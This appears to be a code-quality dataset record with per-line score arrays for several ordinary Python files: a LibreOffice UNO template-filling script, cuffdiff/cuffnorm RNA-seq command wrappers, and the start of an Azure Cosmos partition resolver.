0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.2, 0.037037037037037035, 0.2, 0.037037037037037035, 0.037037037037037035, 0.2, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.3333333333333333, 0.047619047619047616, 0, 0.06451612903225806, 0.011111111111111112, 0.06557377049180328, 0.06060606060606061, 0, 0.0625, 0.06896551724137931, 0.0625, 0.06451612903225806, 0.06349206349206349, 
0.06153846153846154, 0.06666666666666667, 0.06666666666666667, 0.06557377049180328, 0.06896551724137931, 0.06349206349206349, 0.0625, 0.06896551724137931, 0.06451612903225806, 0.06557377049180328, 0.06557377049180328, 0.06349206349206349, 0, 0.06451612903225806, 0, 0.06557377049180328, 0, 0, 0.2, 0, 0, 0.043478260869565216, 0.045454545454545456, 0, 0, 0, 0, 0.3333333333333333, 0.03571428571428571, 0.2, 0.05952380952380952, 0.2, 0, 0.034482758620689655, 0.2, 0, 0.047619047619047616, 0.3333333333333333, 0.03571428571428571, 0, 0.2, 0.03125, 0.01694915254237288, 0.07692307692307693, 0.2, 0, 0.2, 0, 0, 0.2, 0, 0.2, 0, 0, 0, 0.14285714285714285, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009345794392523364, 0.008695652173913044, 0, 0, 0, 0, 0, 0, 0.009900990099009901, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02608695652173913, 0.2, 0, 0, 0.2, 0, 0, 0.02127659574468085, 0.2, 0, 0, 0.2, 0, 0.05, 0.14285714285714285, 0.038461538461538464, 0.14285714285714285, 0.046511627906976744, 0.023809523809523808, 0, 0.14285714285714285, 0.0392156862745098, 0.0196078431372549, 0.046511627906976744, 0.038461538461538464, 0.14285714285714285, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0196078431372549, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.0392156862745098, 0.14285714285714285, 0.0392156862745098, 0.14285714285714285, 0.02127659574468085, 0.05128205128205128, 0.0392156862745098, 0.14285714285714285, 0.046511627906976744, 0.0392156862745098, 0.046511627906976744, 0.0392156862745098, 0.046511627906976744, 0.046511627906976744, 0.14285714285714285, 0.014285714285714285, 0.023809523809523808, 0.05, 0.14285714285714285, 0.023255813953488372, 0, 0, 0.14285714285714285, 0.015384615384615385, 0.14285714285714285, 0.018867924528301886, 0, 0.1111111111111111, 0, 0.007246376811594203, 0.06666666666666667, 
0.01020408163265306, 0.06666666666666667, 0.007246376811594203, 0.06666666666666667, 0.1111111111111111, 0, 0.1111111111111111, 0, 0, 0.1111111111111111, 0, 0, 0.1111111111111111, 0.011235955056179775, 0.14285714285714285, 0.022727272727272728, 0.1111111111111111, 0, 0.1111111111111111, 0, 0, 0.1111111111111111, 0, 0, 0.1111111111111111, 0.02197802197802198, 0.14285714285714285, 0.017857142857142856, 0.015151515151515152, 0.021739130434782608, 0, 0.14285714285714285, 0.08333333333333333, 0, 0.14285714285714285, 0.02564102564102564, 0.03333333333333333, 0.2, 0, 0.058823529411764705, 0, 0.2, 0, 0, 0.037037037037037035, 0.14285714285714285, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0.04, 0, 0, 0, 0.01694915254237288, 0.2, 0, 0, 0.18181818181818182 ]
457
0.039682
false
#!/usr/bin/python3 # http://stackoverflow.com/questions/7783678/remote-control-or-script-open-office-to-edit-word-document-from-python # установить пакет libreoffice-librelogo # запускать от python3 ./script.py; установщик пакетов python3-pip, зпускать как pip3 # soffice.exe "-accept=socket,host=localhost,port=2002;urp;" -writer -headless & # Для Windows - питон встроен в Libreoffice !!! # set path="C:\Program Files\LibreOffice 5\program" # set path="C:\Program Files (x86)\LibreOffice5\program" # перейти в cd "C:\Program Files (x86)\LibreOffice5\program" и выполнить python D:\Distr\program\Python\My-Project\rununo.py # http://lucasmanual.com/mywiki/OpenOffice#Modifyingtext # Джанго http://davidmburke.com/2010/09/21/django-and-openoffice-org-uno-reports/ """ Открыть консоль в каталоге "C:\Program Files (x86)\LibreOffice 5\program" запускать скрипты оттуда: C:\Program Files (x86)\LibreOffice 5\program>python D:\Distr\program\Python\My-Project\oracle.py C:\Program Files (x86)\LibreOffice 5\program>python D:\Distr\program\Python\My-Project\rununo.py все будет работать на питоне встроенном в libreoffice (3.3.5). 
""" import os, sys, json print("debug0") # добавляем каталог модуля libreoffice-uno (не обязательно) lib_uno = os.path.abspath(os.path.join("C:/Program Files (x86)/LibreOffice 5/program/")) sys.path.append(lib_uno) print("debug0.1") import uno # модуль libreoffice-uno print("debug0.2") #import unohelper #import socket print("debug1") ############# libreoffice UNO ctx = uno.getComponentContext() service_manager = ctx.getServiceManager() # Конфиги url = "file:///C:/Users/langer/script/LO_REPORT/rununo/" file = "myfile.odt" new_file = "new_myfile.odt" host = "localhost" port = 2002 print("debug2") resolver = ctx.ServiceManager.createInstanceWithContext("com.sun.star.bridge.UnoUrlResolver", ctx) context = resolver.resolve("uno:socket,host="+ str(host) +",port="+ str(port) +";urp;StarOffice.ComponentContext") desktop = context.ServiceManager.createInstanceWithContext("com.sun.star.frame.Desktop", ctx) document = desktop.loadComponentFromURL(url+file, "_blank", 0, ()) replace_desc = document.createReplaceDescriptor() print("debug3") def replaceText(key, value): replace_desc.setSearchString("{{"+str(key)+"}}") # Текст для замены {{text}} print("Передано в UNO: ",key, value) # отладка find_iter = document.findFirst(replace_desc) while find_iter: find_iter.String = str(value) # в виде строки find_iter = document.findNext(find_iter.End, replace_desc) # заменяем текст if not find_iter: break # текст заменен print("debug4") #document.dispose() ############# end UNO ############# Парсим json out_parameter = """ { "template": "myfile.odt", "outformat": "docx", "text": { "name": "Иванов Иван Иванович", "age": 30, "keywords": [ "human", "developer" ] }, "placeholder": { "name": "Иванов Иван Иванович", "age": 30, "keywords": [ "human", "developer" ] }, "input": { "name": "Иванов Иван Иванович", "age": 30, "keywords": [ "human", "developer" ] }, "userfield": { "name": "Иванов Иван Иванович", "age": 30, "keywords": [ "human", "developer" ] } } """ print("debug5") try: decoded = 
json.loads(out_parameter) text_json = decoded['text'] # замена текста placeholder_json = decoded['placeholder'] # заполнение плейсхолдеров input_json = decoded['input'] # заполнение инпутов userfield_json = decoded['userfield'] # заполнение узерфилдов #print ("JSON parsing example: ", decoded) # вытаскиваем ключи и значения из блока 'text' for key, value in text_json.items(): #print (key,": ", value) # ф-ция замены текста replaceText(key, value) # сохранить документ document.storeAsURL(url+new_file,()) print("Сохранено в ",url+new_file ) # не удалось распарсить json except (ValueError, KeyError, TypeError): print ("Ошибка: JSON format error") ############# end json sys.exit()
[ "#!/usr/bin/python3\n", "# http://stackoverflow.com/questions/7783678/remote-control-or-script-open-office-to-edit-word-document-from-python\n", "# установить пакет libreoffice-librelogo\n", "# запускать от python3 ./script.py; установщик пакетов python3-pip, зпускать как pip3\n", "# soffice.exe \"-accept=socket,host=localhost,port=2002;urp;\" -writer -headless &\n", "# Для Windows - питон встроен в Libreoffice !!!\n", "# set path=\"C:\\Program Files\\LibreOffice 5\\program\"\n", "# set path=\"C:\\Program Files (x86)\\LibreOffice5\\program\"\n", "# перейти в cd \"C:\\Program Files (x86)\\LibreOffice5\\program\" и выполнить python D:\\Distr\\program\\Python\\My-Project\\rununo.py\n", "# http://lucasmanual.com/mywiki/OpenOffice#Modifyingtext\n", "# Джанго http://davidmburke.com/2010/09/21/django-and-openoffice-org-uno-reports/\n", "\"\"\"\n", "Открыть консоль в каталоге \"C:\\Program Files (x86)\\LibreOffice 5\\program\"\n", "запускать скрипты оттуда:\n", "C:\\Program Files (x86)\\LibreOffice 5\\program>python D:\\Distr\\program\\Python\\My-Project\\oracle.py\n", "C:\\Program Files (x86)\\LibreOffice 5\\program>python D:\\Distr\\program\\Python\\My-Project\\rununo.py\n", "все будет работать на питоне встроенном в libreoffice (3.3.5).\n", "\"\"\"\n", "\n", "import os, sys, json\n", "print(\"debug0\")\n", "# добавляем каталог модуля libreoffice-uno (не обязательно)\n", "lib_uno = os.path.abspath(os.path.join(\"C:/Program Files (x86)/LibreOffice 5/program/\"))\n", "sys.path.append(lib_uno)\n", "print(\"debug0.1\")\n", "import uno # модуль libreoffice-uno\n", "print(\"debug0.2\")\n", "#import unohelper\n", "#import socket\n", " \n", "print(\"debug1\")\n", " \n", "############# libreoffice UNO\n", "ctx = uno.getComponentContext()\n", "service_manager = ctx.getServiceManager() \n", "\n", "# Конфиги\n", "url = \"file:///C:/Users/langer/script/LO_REPORT/rununo/\"\n", "file = \"myfile.odt\"\n", "new_file = \"new_myfile.odt\"\n", "host = \"localhost\"\n", "port = 2002\n", 
"\n", "print(\"debug2\")\n", "\n", "resolver = ctx.ServiceManager.createInstanceWithContext(\"com.sun.star.bridge.UnoUrlResolver\", ctx)\n", "context = resolver.resolve(\"uno:socket,host=\"+ str(host) +\",port=\"+ str(port) +\";urp;StarOffice.ComponentContext\")\n", "desktop = context.ServiceManager.createInstanceWithContext(\"com.sun.star.frame.Desktop\", ctx)\n", "document = desktop.loadComponentFromURL(url+file, \"_blank\", 0, ())\n", "\n", "replace_desc = document.createReplaceDescriptor() \n", "\n", "print(\"debug3\")\n", "\n", "def replaceText(key, value):\n", " replace_desc.setSearchString(\"{{\"+str(key)+\"}}\") # Текст для замены {{text}}\n", " print(\"Передано в UNO: \",key, value) # отладка\n", "\n", " find_iter = document.findFirst(replace_desc)\n", " while find_iter:\n", " find_iter.String = str(value) # в виде строки\n", " find_iter = document.findNext(find_iter.End, replace_desc) # заменяем текст\n", " if not find_iter: break # текст заменен\n", "\n", "print(\"debug4\")\n", " \n", " #document.dispose()\n", "############# end UNO\n", " \n", "\n", "############# Парсим json\n", "out_parameter = \"\"\"\n", "{\n", " \"template\": \"myfile.odt\",\n", " \"outformat\": \"docx\",\n", " \"text\": {\n", " \"name\": \"Иванов Иван Иванович\",\n", " \"age\": 30,\n", " \"keywords\": [ \"human\", \"developer\" ]\n", " },\n", " \"placeholder\": {\n", " \"name\": \"Иванов Иван Иванович\",\n", " \"age\": 30,\n", " \"keywords\": [ \"human\", \"developer\" ]\n", " },\n", " \"input\": {\n", " \"name\": \"Иванов Иван Иванович\",\n", " \"age\": 30,\n", " \"keywords\": [ \"human\", \"developer\" ]\n", " },\n", " \"userfield\": {\n", " \"name\": \"Иванов Иван Иванович\",\n", " \"age\": 30,\n", " \"keywords\": [ \"human\", \"developer\" ]\n", " }\n", "}\n", "\"\"\"\n", "\n", "print(\"debug5\")\n", "\n", "try:\n", " decoded = json.loads(out_parameter)\n", " text_json = decoded['text'] # замена текста\n", " placeholder_json = decoded['placeholder'] # заполнение 
плейсхолдеров\n", " input_json = decoded['input'] # заполнение инпутов\n", " userfield_json = decoded['userfield'] # заполнение узерфилдов\n", " #print (\"JSON parsing example: \", decoded)\n", " \n", " # вытаскиваем ключи и значения из блока 'text' \n", " for key, value in text_json.items():\n", " #print (key,\": \", value)\n", " \n", " # ф-ция замены текста\n", " replaceText(key, value)\n", " \n", " # сохранить документ\n", " document.storeAsURL(url+new_file,())\n", " print(\"Сохранено в \",url+new_file )\n", " \n", "\n", "# не удалось распарсить json\n", "except (ValueError, KeyError, TypeError):\n", " print (\"Ошибка: JSON format error\")\n", "############# end json\n", "\n", "\n", "\n", "sys.exit()\n" ]
[ 0, 0, 0, 0.011627906976744186, 0.012345679012345678, 0, 0, 0, 0.008, 0, 0.012195121951219513, 0, 0.04054054054054054, 0, 0.09278350515463918, 0.08247422680412371, 0, 0, 0, 0.047619047619047616, 0, 0, 0.011235955056179775, 0, 0, 0.05555555555555555, 0, 0.05555555555555555, 0.06666666666666667, 0.25, 0, 0.25, 0.03333333333333333, 0, 0.023255813953488372, 0, 0, 0.016129032258064516, 0.041666666666666664, 0, 0.043478260869565216, 0.0625, 0, 0, 0, 0.010101010101010102, 0.043478260869565216, 0.010638297872340425, 0, 0, 0.0196078431372549, 0, 0, 0, 0.034482758620689655, 0.024691358024691357, 0.0392156862745098, 0, 0, 0, 0.018518518518518517, 0.023809523809523808, 0.041666666666666664, 0, 0.0625, 0.1111111111111111, 0.08333333333333333, 0.045454545454545456, 0.5, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016129032258064516, 0.0136986301369863, 0.014925373134328358, 0.014285714285714285, 0.02127659574468085, 0.2, 0.01818181818181818, 0, 0.06451612903225806, 0.14285714285714285, 0.03571428571428571, 0.03333333333333333, 0.14285714285714285, 0, 0.024390243902439025, 0.05, 0.14285714285714285, 0, 0, 0, 0.025, 0.043478260869565216, 0, 0, 0, 0.09090909090909091 ]
128
0.026695
false
from pandas import read_table import os def load_cuffdiff(filename): if os.path.isdir(filename): filename = os.path.join(filename, "isoform_exp.diff") table = read_table(filename, index_col="test_id", true_values=["yes"], false_values=["no"]) table = table.rename(columns={"log2(fold_change)": "fold_change"}) return table def run_cuffdiff(samples_dir_1,samples_dir_2,sample_name_1,sample_name_2,organism,output_dir, cuffdiff='cuffdiff',indexes_dir='../indexes/', threads = 1, library_norm_method = 'quartile', fdr = 0.05, library_type ='fr-firststrand', index_type='.gtf', more_options=None): '''Run cuffdiff from the commandline Input: samples_dir_1 = list of sample directories for each replicate in sample 1 samples_dir_2 = list of sample directories for each replicate in sample 2 samples_name_1 = sample name for sample 1 samples_name_1 = sample name for sample 2 organism = organism name output_dir = directory of cuffdiff output cuffdiff = string to run cuffdiff (give the absolute directory of cuffdiff.exe if cuffdiff is not in PATH) indexes_dir = directory where indexes are located library_type = string indicating the library type (e.g. fr-first-strand) more_options = other options not specified (e.g. 
'--library-type fr-firststrand) Output: Example usage: directories for this example: /home/douglas/Documents/RNA_sequencing/fastq /home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4 (sample 1 .bam file locations) /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1 (sample 2 .bam file locations) /home/douglas/Documents/RNA_sequencing/indexes (.gtf file location) /home/douglas/Documents/RNA_sequencing/fastq/ (output directory) at the terminal: cd /home/douglas/Documents/RNA_sequencing/fastq python3 at the python command line: from resequencing_utilities.cuffdiff import run_cuffdiff run_cuffdiff(['/home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4/140818_11_OxicEvo04EcoliGlcM9_Broth-4.bam'], ['/home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1.bam'], '140818_11_OxicEvo04EcoliGlcM9_Broth-4','140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1', 'ecoli_mg1655', '/home/douglas/Documents/RNA_sequencing/fastq/', threads = 48) ''' # parse input into string values sample_1=','.join(samples_dir_1); sample_2=','.join(samples_dir_2); if index_type in ['.gtf','.gff']: gff_index = indexes_dir + organism + index_type else: print('index_type not recognized.') cuffdiff_options = "--library-type %s --library-norm-method %s --FDR %s --num-threads %s" % \ (library_type,library_norm_method,fdr,threads); if more_options: cuffdiff_options = cuffciff_options + ' ' + more_options; samples_message = sample_name_1 + "_vs_" + sample_name_2; # make the cuffdiff_command #cuffdiff [options] <transcripts.gtf> <sample1_replicate1.bam,...> <sample2_replicate1.bam,...> cuffdiff_command = "%s %s -o %s -L %s,%s %s %s %s " % \ (cuffdiff, cuffdiff_options, output_dir, sample_name_1,sample_name_2,gff_index, sample_1,sample_2); # execute the command print(cuffdiff_command) os.system(cuffdiff_command) def 
run_cuffnorm(samples_dirs,samples_names,organism,output_dir, cuffnorm='cuffnorm',indexes_dir='../indexes/', threads = 1, library_norm_method = 'quartile', library_type ='fr-firststrand', index_type='.gtf', more_options=None): '''Run cuffnorm from the commandline Input: samples_dirs = list of strings of sample directories for each replicate in samples 1-N use "," to seperate replicates per sample use "|" to seperate lists of replicates where sample_dirs = s1-r1,s1-r2,s1-r3,...|s2-r1,s2-r2,s2-r3,...|...|sN-r1,sN-r2,sN-r3,... samples_names = sample name for sample 1-N s1,s2,...,sN,... organism = organism name output_dir = directory of cuffnorm output cuffnorm = string to run cuffnorm (give the absolute directory of cuffnorm.exe if cuffnorm is not in PATH) indexes_dir = directory where indexes are located library_type = string indicating the library type (e.g. fr-first-strand) index_type = string indicating the index file extention (e.g. '.gtf' or '.gff') more_options = other options not specified (e.g. 
'--library-type fr-firststrand) Output: Example usage: directories for this example: /home/douglas/Documents/RNA_sequencing/fastq /home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4 (sample 1 .bam file locations) /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1 (sample 2 .bam file locations) /home/douglas/Documents/RNA_sequencing/indexes (.gtf file location) /home/douglas/Documents/RNA_sequencing/fastq/ (output directory) at the terminal: cd /home/douglas/Documents/RNA_sequencing/fastq python3 at the python command line: from resequencing_utilities.cuffdiff import run_cuffnorm run_cuffnorm( '/home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4/140818_11_OxicEvo04EcoliGlcM9_Broth-4.bam,\ /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1.bam', '140818_11_OxicEvo04EcoliGlcM9_Broth-4,140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1', 'ecoli_mg1655', '/home/douglas/Documents/RNA_sequencing/fastq/', threads = 48) NOTES: I apologize in advance for the use of strings to specify sample_dirs/sample_names strings are used to avoid errors when pass the arguments in at the command line ''' # parse input into string values sample_1 = []; for sdir in samples_dirs: sample_tmp=','.join(sdir); sample_1.append(sample_tmp); if index_type in ['.gtf','.gff']: gff_index = indexes_dir + organism + index_type else: print('index_type not recognized.') cuffnorm_options = "--library-type %s --library-norm-method %s --num-threads %s" % \ (library_type,library_norm_method,threads); if more_options: cuffnorm_options = cuffciff_options + ' ' + more_options; cuffnorm_L = samples_names; cuffnorm_samples_1 = samples_dirs.replace("|",' '); samples_message = samples_names.split(",")[0] + "_to_" + samples_names.split(",")[-1] + "_cuffnorm"; # make the cuffnorm_command #cuffnorm [options] <transcripts.gtf> <sample1_replicate1.bam,...> 
<sample2_replicate1.bam,...> ... <sampleN_replicate1.bam,...> cuffnorm_command = "%s %s -o %s -L %s %s %s " % \ (cuffnorm, cuffnorm_options, output_dir, cuffnorm_L,gff_index, cuffnorm_samples_1); # execute the command print(cuffnorm_command) os.system(cuffnorm_command)
[ "from pandas import read_table\n", "import os\n", "\n", "def load_cuffdiff(filename):\n", " if os.path.isdir(filename):\n", " filename = os.path.join(filename, \"isoform_exp.diff\")\n", " table = read_table(filename, index_col=\"test_id\",\n", " true_values=[\"yes\"], false_values=[\"no\"])\n", " table = table.rename(columns={\"log2(fold_change)\": \"fold_change\"})\n", " \n", " return table\n", "\n", "def run_cuffdiff(samples_dir_1,samples_dir_2,sample_name_1,sample_name_2,organism,output_dir,\n", " cuffdiff='cuffdiff',indexes_dir='../indexes/', threads = 1,\n", " library_norm_method = 'quartile', fdr = 0.05,\n", " library_type ='fr-firststrand',\n", " index_type='.gtf',\n", " more_options=None):\n", " '''Run cuffdiff from the commandline\n", "\n", " Input:\n", " samples_dir_1 = list of sample directories for each replicate in sample 1\n", " samples_dir_2 = list of sample directories for each replicate in sample 2\n", " samples_name_1 = sample name for sample 1\n", " samples_name_1 = sample name for sample 2\n", " organism = organism name\n", " output_dir = directory of cuffdiff output\n", " cuffdiff = string to run cuffdiff (give the absolute directory of cuffdiff.exe if cuffdiff is not in PATH)\n", " indexes_dir = directory where indexes are located\n", " library_type = string indicating the library type (e.g. fr-first-strand)\n", " more_options = other options not specified (e.g. 
'--library-type fr-firststrand)\n", "\n", " Output:\n", " \n", " Example usage:\n", " directories for this example: \n", " /home/douglas/Documents/RNA_sequencing/fastq\n", " /home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4 (sample 1 .bam file locations)\n", " /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1 (sample 2 .bam file locations)\n", " /home/douglas/Documents/RNA_sequencing/indexes (.gtf file location)\n", " /home/douglas/Documents/RNA_sequencing/fastq/ (output directory) \n", " \n", " at the terminal:\n", " cd /home/douglas/Documents/RNA_sequencing/fastq\n", " python3\n", "\n", " at the python command line:\n", " from resequencing_utilities.cuffdiff import run_cuffdiff\n", " run_cuffdiff(['/home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4/140818_11_OxicEvo04EcoliGlcM9_Broth-4.bam'],\n", " ['/home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1.bam'],\n", " '140818_11_OxicEvo04EcoliGlcM9_Broth-4','140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1',\n", " 'ecoli_mg1655',\n", " '/home/douglas/Documents/RNA_sequencing/fastq/',\n", " threads = 48)\n", "\n", " '''\n", " \n", " # parse input into string values\n", " sample_1=','.join(samples_dir_1);\n", " sample_2=','.join(samples_dir_2);\n", " \n", " if index_type in ['.gtf','.gff']:\n", " gff_index = indexes_dir + organism + index_type\n", " else:\n", " print('index_type not recognized.')\n", "\n", " cuffdiff_options = \"--library-type %s --library-norm-method %s --FDR %s --num-threads %s\" % \\\n", " (library_type,library_norm_method,fdr,threads);\n", " if more_options:\n", " cuffdiff_options = cuffciff_options + ' ' + more_options;\n", "\n", " samples_message = sample_name_1 + \"_vs_\" + sample_name_2;\n", "\n", " # make the cuffdiff_command\n", " #cuffdiff [options] <transcripts.gtf> <sample1_replicate1.bam,...> <sample2_replicate1.bam,...> \n", " 
cuffdiff_command = \"%s %s -o %s -L %s,%s %s %s %s \" % \\\n", " (cuffdiff, cuffdiff_options, output_dir, sample_name_1,sample_name_2,gff_index, sample_1,sample_2);\n", "\n", " # execute the command\n", " print(cuffdiff_command)\n", " os.system(cuffdiff_command)\n", "\n", "def run_cuffnorm(samples_dirs,samples_names,organism,output_dir,\n", " cuffnorm='cuffnorm',indexes_dir='../indexes/', threads = 1,\n", " library_norm_method = 'quartile',\n", " library_type ='fr-firststrand',\n", " index_type='.gtf',\n", " more_options=None):\n", " '''Run cuffnorm from the commandline\n", "\n", " Input:\n", " samples_dirs = list of strings of sample directories for each replicate in samples 1-N\n", " use \",\" to seperate replicates per sample\n", " use \"|\" to seperate lists of replicates\n", " where sample_dirs = s1-r1,s1-r2,s1-r3,...|s2-r1,s2-r2,s2-r3,...|...|sN-r1,sN-r2,sN-r3,...\n", " samples_names = sample name for sample 1-N\n", " s1,s2,...,sN,...\n", " organism = organism name\n", " output_dir = directory of cuffnorm output\n", " cuffnorm = string to run cuffnorm (give the absolute directory of cuffnorm.exe if cuffnorm is not in PATH)\n", " indexes_dir = directory where indexes are located\n", " library_type = string indicating the library type (e.g. fr-first-strand)\n", " index_type = string indicating the index file extention (e.g. '.gtf' or '.gff')\n", " more_options = other options not specified (e.g. 
'--library-type fr-firststrand)\n", "\n", " Output:\n", " \n", " Example usage:\n", " directories for this example: \n", " /home/douglas/Documents/RNA_sequencing/fastq\n", " /home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4 (sample 1 .bam file locations)\n", " /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1 (sample 2 .bam file locations)\n", " /home/douglas/Documents/RNA_sequencing/indexes (.gtf file location)\n", " /home/douglas/Documents/RNA_sequencing/fastq/ (output directory) \n", " \n", " at the terminal:\n", " cd /home/douglas/Documents/RNA_sequencing/fastq\n", " python3\n", "\n", " at the python command line:\n", " from resequencing_utilities.cuffdiff import run_cuffnorm\n", " run_cuffnorm(\n", " '/home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4/140818_11_OxicEvo04EcoliGlcM9_Broth-4.bam,\\\n", " /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1.bam',\n", " '140818_11_OxicEvo04EcoliGlcM9_Broth-4,140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1',\n", " 'ecoli_mg1655',\n", " '/home/douglas/Documents/RNA_sequencing/fastq/',\n", " threads = 48)\n", "\n", " NOTES:\n", " I apologize in advance for the use of strings to specify sample_dirs/sample_names\n", " strings are used to avoid errors when pass the arguments in at the command line\n", "\n", " '''\n", " \n", " # parse input into string values\n", " sample_1 = [];\n", " for sdir in samples_dirs:\n", " sample_tmp=','.join(sdir);\n", " sample_1.append(sample_tmp);\n", " \n", " if index_type in ['.gtf','.gff']:\n", " gff_index = indexes_dir + organism + index_type\n", " else:\n", " print('index_type not recognized.')\n", "\n", " cuffnorm_options = \"--library-type %s --library-norm-method %s --num-threads %s\" % \\\n", " (library_type,library_norm_method,threads);\n", " if more_options:\n", " cuffnorm_options = cuffciff_options + ' ' + 
more_options;\n", " cuffnorm_L = samples_names;\n", " cuffnorm_samples_1 = samples_dirs.replace(\"|\",' ');\n", "\n", " samples_message = samples_names.split(\",\")[0] + \"_to_\" + samples_names.split(\",\")[-1] + \"_cuffnorm\";\n", "\n", " # make the cuffnorm_command\n", " #cuffnorm [options] <transcripts.gtf> <sample1_replicate1.bam,...> <sample2_replicate1.bam,...> ... <sampleN_replicate1.bam,...>\n", " cuffnorm_command = \"%s %s -o %s -L %s %s %s \" % \\\n", " (cuffnorm, cuffnorm_options, output_dir, cuffnorm_L,gff_index, cuffnorm_samples_1);\n", "\n", " # execute the command\n", " print(cuffnorm_command)\n", " os.system(cuffnorm_command)" ]
[ 0, 0, 0, 0.034482758620689655, 0, 0, 0, 0.02, 0, 0.2, 0, 0, 0.07446808510638298, 0.05063291139240506, 0.07692307692307693, 0.0392156862745098, 0.02631578947368421, 0.02564102564102564, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0, 0.011764705882352941, 0, 0, 0.2, 0, 0.02857142857142857, 0, 0.008064516129032258, 0.007936507936507936, 0, 0.013157894736842105, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0.05263157894736842, 0.05263157894736842, 0.2, 0.02631578947368421, 0, 0, 0, 0, 0.01020408163265306, 0.07142857142857142, 0, 0.015151515151515152, 0, 0.016129032258064516, 0, 0, 0.0297029702970297, 0, 0.046296296296296294, 0, 0, 0, 0, 0, 0.06153846153846154, 0.05063291139240506, 0.05660377358490566, 0.0392156862745098, 0.02631578947368421, 0.02564102564102564, 0, 0, 0, 0.01098901098901099, 0, 0, 0.01020408163265306, 0, 0, 0, 0, 0.009009009009009009, 0, 0, 0.011904761904761904, 0.011764705882352941, 0, 0, 0.2, 0, 0.02857142857142857, 0, 0.008064516129032258, 0.007936507936507936, 0, 0.013157894736842105, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0.011904761904761904, 0, 0, 0.2, 0, 0.05263157894736842, 0, 0.05714285714285714, 0.02702702702702703, 0.1111111111111111, 0.02631578947368421, 0, 0, 0, 0, 0.011235955056179775, 0.057692307692307696, 0, 0.015151515151515152, 0.03125, 0.03571428571428571, 0, 0.01904761904761905, 0, 0, 0.015037593984962405, 0, 0.03260869565217391, 0, 0, 0, 0.03225806451612903 ]
163
0.020037
false
#The MIT License (MIT)
#Copyright (c) 2014 Microsoft Corporation

#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:

#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.

#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.

"""Range partition resolver implementation in the Azure Cosmos database service.
"""

import azure.cosmos.range as prange


class RangePartitionResolver(object):
    """Implements partitioning based on ranges, letting requests and data be
    distributed across a number of partitions (one collection per range).
    """

    def __init__(self, partition_key_extractor, partition_map):
        """
        :param lambda partition_key_extractor:
            Callable returning the partition key for the document passed in.
        :param dict partition_map:
